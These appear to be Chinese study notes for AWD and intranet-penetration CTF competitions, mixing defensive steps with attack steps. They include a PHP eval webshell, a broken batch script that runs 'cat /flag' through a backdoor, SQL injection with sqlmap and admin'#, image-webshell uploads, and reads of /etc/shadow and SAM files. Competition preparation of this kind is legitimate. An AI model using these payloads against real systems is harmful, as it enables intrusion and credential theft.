AWD(高职组)比赛思路
- 流量分析虚拟机,下载流量文件进行数据分析(可能无)*
- flag刷新
- flag被拿走,该队扣分,攻击者得分
- 主办方对队伍的服务器进行check,扣分。得分由其他队伍均分
- 数据库密码
- 数据库 (database-config.php)
- /etc/redis/redis.conf
- tomacat-user.xml
- webpass.
- 用户,目录,端口,进程信息(提权)
(ps,netstat -anptu,top,/etc/issue) - 网站后门,web日志(get,),flag日志,history,(备份网站)
- 备份与恢复(删源码)
- tar -czf 目录
- 备份到本地
- 编写waf
- 做好数据清洗和日志信息
- 文件与进程监控
- 文件监控(python脚本,filecmp,shutil,os)
- 进程监控
- 修改服务口令,约束服务外联
- 同步当前ssh用户主目录
- 定期清理seesions文件,tmp目录
- 服务弱口令
- 主办方后门
- 确定cms版本号,搜exploit进行利用
- 一句话木马(限制ip,避免被D盾检测)
- Linux基础
- grep -nir “eval” /var/www/html
- ps -ef |grep httpd
- echo -e “\oldpasswd\nnewpasswd\nnewpasswd” | passwd
- ps -u apache -o user,pid
- contrab -r //删除自动化任务
- 常用脚本
- php程序脚本
- waf加载/卸载程序(过滤)
- 文件监控
- 进程监控
- 批量攻击脚本
- webshell管理系统
- mac地址绑定
- 漏洞(sql+文件上传+文件解析漏洞)
- 维持权限(提权),加固。
nc -lvvp 9999
服务器提权
cp flag放在网站目录下(contrab 创建任务直接cp flag)
import requests
for i in range():
ip = ???
try:
req = requests.get(url)
print(ip,req.text)
expect:
psss
eval(_$GET[PASS])
requests.get(url+?PASS=system("cat /flag"))
- 文件包含file_include(没有必要的话,直接过滤)
- check_login($user直接拼接到Sql查询语句,过滤不严格)
- 越权
- 上传文件(严格,验证后缀,上传文件功能删除)
- extract($_REQUEST); a ( a( a(_post(‘b’)) 一句话木马(代码注入)
- 逻辑漏洞:admin 111 验证码正确(验证码不刷新不改变)post注入
sqlmap -r sql.txt --dbs (爆库)
CFS综合靶场(本科组)比赛
- 网络拓扑
采用内网渗透的方式
攻击机IP:172.24.10.x(255.255.255.0) 与第一层靶机的网卡1处于同一网段
第一层靶机 网卡1:172.24.10.x(255.255.255.0)
网卡2:172.24.11.x(255.255.255.0)
第二层靶机 网卡1:172.24.11.x(255.255.255.0)
网卡2:172.24.12.x(255.255.255.0)
第三层靶机 网卡1:172.24.12.x(255.255.255.0)
攻入第一层靶机后,在第一层靶机上做代理依次访问第二台靶机
攻击思路
- nmap扫描
nmap -a -sV ip - 扫描后台
- 御剑
- dirsearch(python dirsearch.py -u “URL” )
- 登陆界面尝试sql注入 (万能密码admin’#)
- 上传webshell
- 找上传目录(注意扫描出来的后台)
- 传图片马 1.jpg.php等
- 测试phpinfo();
- 一句话木马
<?php phpinfo(); eval($_POST["PASS"]) ;?>
使用中国菜刀连接
- 寻找flag 常见flag位置
- /
- /etc/passwd
- /etc/shadow
- grep “flag” -R /
- 网站后台
- http ssh等配置文件
- crontab
- 数据库
- 网站的配置文件如:config.php
- 桌面 流量包 开机启动项 SAM密码文件 日志文件(windows)
- 收集提权脚本和代理脚本